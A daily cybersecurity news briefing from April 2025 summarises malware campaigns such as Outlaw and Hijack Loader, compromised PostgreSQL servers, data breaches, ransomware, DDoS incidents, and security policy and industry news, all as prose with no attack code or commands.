April 02, 2025 – Cyber Briefing

👉 What’s trending in cybersecurity today?

Outlaw Linux Malware, SSH Brute-Forcing, Botnet, Wireless Attack, Passwords, Backdoor Signals, Hijack Loader, Anti-VM Checks, Call Stack Spoofing, PostgreSQL Servers, Fileless Cryptocurrency Mining, Suspicious Scanning Activity, Palo Alto Networks, GlobalProtect Gateways, Houston Housing Authority, Data Breach, Russia RZD Railway, Cyberattack, Italy, Ticketing Systems, SimonMed Imaging, Sensitive Patient Information, Systex Corporation, Ransomware Attack, US House Homeland Security, State and Local Cybersecurity, EU Strategy, Internal Security, Encryption Issues, Python Lock File Format, Dependency Management, ReliaQuest, AI Security Platform, Cybercriminals, Lookalike Domains, Financial Fraud, Email Scams.

Listen to the full podcast

🚨 Cyber Alerts

1. Outlaw Linux Malware Uses SSH Brute-Forcing

Outlaw is a persistent Linux malware that leverages basic but effective techniques to maintain a long-running botnet. It primarily uses SSH brute-forcing to exploit systems with weak or default credentials, enabling widespread propagation. Once access is gained, it deploys malicious payloads and establishes persistence through cron jobs and SSH key manipulation. The malware spreads rapidly within local subnets, showing its worm-like propagation capabilities, while embedding a modified cryptocurrency miner for monetization.

2. Wireless Attack Steals Passwords Undetected

Researchers have discovered a new attack method that exploits wireless signals to create covert backdoors. Known as the “Channel Triggered Backdoor Attack,” this technique manipulates subtle variations in wireless signals, allowing attackers to bypass security systems. By encoding commands in these signal variations, the malware can capture keystrokes during password entry, effectively harvesting sensitive data.

3. Hijack Loader Malware New Evasion Tactics

Hijack Loader has received significant updates, introducing call stack spoofing and anti-VM checks to improve evasion tactics. These new features help it hide its activities and avoid detection by traditional security systems. The malware continues to deliver second-stage payloads, such as information stealers, and inject malicious code to compromise systems. By leveraging advanced techniques like the Heaven’s Gate method and adding persistence modules, Hijack Loader ensures long-term control over infected devices.

4. Over 1500 PostgreSQL Servers Compromised

A cloud security firm reported an ongoing attack targeting exposed PostgreSQL instances, with over 1,500 compromised servers. The threat actor, known as JINX-0126, uses a sophisticated attack that deploys fileless cryptocurrency miners, evading detection through unique hashes and the exploitation of the COPY SQL command. The campaign leverages weak PostgreSQL configurations and involves dropping malicious binaries like PG_CORE and postmaster, which set up persistence and escalate privileges.

5. Login Scans Hit Palo Alto Networks Systems

A surge in suspicious login attempts has been observed targeting Palo Alto Networks’ PAN-OS GlobalProtect portals. Over 24,000 unique IP addresses were involved, peaking at nearly 24,000 daily attempts between March 17 and 26, 2025. This activity is seen as a coordinated effort to probe for vulnerabilities, potentially preparing for later exploitation. The primary sources of traffic were the United States and Canada, with additional targets in the United Kingdom, Ireland, Russia, and Singapore. Experts believe this pattern of scanning could precede attacks leveraging new vulnerabilities.

💥 Cyber Incidents

6. Houston Housing Authority Breach Affects 30K

The Houston Housing Authority recently notified over 30,000 Texans about a data breach caused by a ransomware attack. The breach exposed sensitive personal information, including Social Security numbers, medical details, financial information, and addresses. After confirming the breach, HHA initiated an investigation and began notifying affected individuals. Affected individuals will receive breach notification letters with details on what specific data was compromised.

7. RZD Railway Cyberattack Disrupts Services

RZD, Russia’s state-owned railway, experienced a cyberattack that temporarily disrupted its website and mobile app. The attack, identified as a distributed denial-of-service (DDoS) assault, overwhelmed the platforms with traffic, making them inaccessible. Despite this, ticket sales continued at physical locations across stations and terminals, ensuring services for travelers. RZD has not disclosed details about the scale of the attack or when full functionality will be restored, while the identity of the attacker remains unknown.

8. Cyberattack Disrupts Mom Ticketing in Italy

An ongoing cyberattack has caused significant disruption to Mom’s electronic ticketing systems in Treviso, Italy. The incident, which targeted Plus Service’s Telemaco platform, left commuters and students facing difficulties for two days. The attack rendered digital services inaccessible, leading passengers to rely on physical tickets and overwhelmed call centers. The system began to return to normal later in the day, although some issues persisted.

9. SimonMed Imaging Reports Data Breach Impact

SimonMed Imaging recently disclosed a data breach that compromised sensitive patient information. Between January 21 and February 5, 2025, an unauthorized third party accessed personal data, including names, Social Security numbers, medical records, and health insurance details. The company has launched an investigation to assess the full impact and is notifying affected individuals about the exposed information. SimonMed, an outpatient imaging provider based in Arizona, continues to monitor the situation and will provide updates as more details emerge.

10. Systex Corporation Reports Ransomware Attack

Systex Corporation, a Taiwanese IT service provider, confirmed a ransomware attack on March 31, 2025, after receiving a ransom note. Preliminary investigations suggest the involvement of the hacker group CrazyHunter, which has previously targeted Taiwanese medical institutions. While the company has not disclosed details about the ransom demand or the impact on data, it has assured that no significant operational disruptions have occurred thus far.

📢 Cyber News

11. US House Panel Reviews Cyber Grant Program

The U.S. House Homeland Security Subcommittee examined the State and Local Cybersecurity Grant Program, which is up for reauthorization this year. Cybersecurity experts testified that with targeted adjustments, the program could improve its effectiveness in strengthening the cybersecurity of state and local governments. Subcommittee members also explored potential collaborations between the federal government and state and local governments to combat the rising threat of cyberattacks.

12. EU Commission Launches New Security Strategy

The European Commission has introduced the ProtectEU strategy to enhance internal security within the European Union. A central part of the plan is boosting Europol’s capabilities, positioning it to handle large-scale investigations and provide stronger support to member states. The strategy also aims to address challenges related to encryption, aiming to find solutions that balance law enforcement needs with privacy rights. In addition, the Commission seeks to improve intelligence-sharing among member states, strengthen cybersecurity measures, and ensure that the EU is prepared for evolving security threats.

13. Python Adopts Standardized Lock File Format

The Python Software Foundation has introduced the pylock.toml format to standardize dependency management across the ecosystem. This new lock file format aims to improve security, reproducibility, and tool interoperability by ensuring that dependencies are accurately recorded and their installation can be reliably reproduced. By unifying existing tools like Poetry, PDM, and pip-tools, pylock.toml eliminates compatibility issues and ensures developers are not locked into specific tools. The format includes critical security features such as package hashes and file sizes, making it more secure and resistant to supply chain attacks.

14. ReliaQuest Raises $500M for AI Security

ReliaQuest has successfully raised $500 million, bringing its valuation to $3.4 billion, to further develop its AI-driven cybersecurity platform, GreyMatter. The funding will be used to enhance the platform’s automation capabilities, enabling security teams to respond to cyber threats more efficiently. With over 1,000 customers and $300 million in annual recurring revenue, ReliaQuest is expanding its international presence and improving its ability to detect, contain, and investigate security incidents.

15. Lookalike Domains Fuel Cybercriminal Scams

Cybercriminals are increasingly using lookalike domains to execute email-based social engineering and financial fraud scams. These domains closely resemble legitimate websites, making it difficult for victims to distinguish between genuine and fraudulent communications. Common tactics include phishing, executive impersonation, and invoice scams, which target sectors like finance, legal services, and insurance. Attackers gather information from public sources and data breaches to personalize their emails, further increasing the likelihood of success.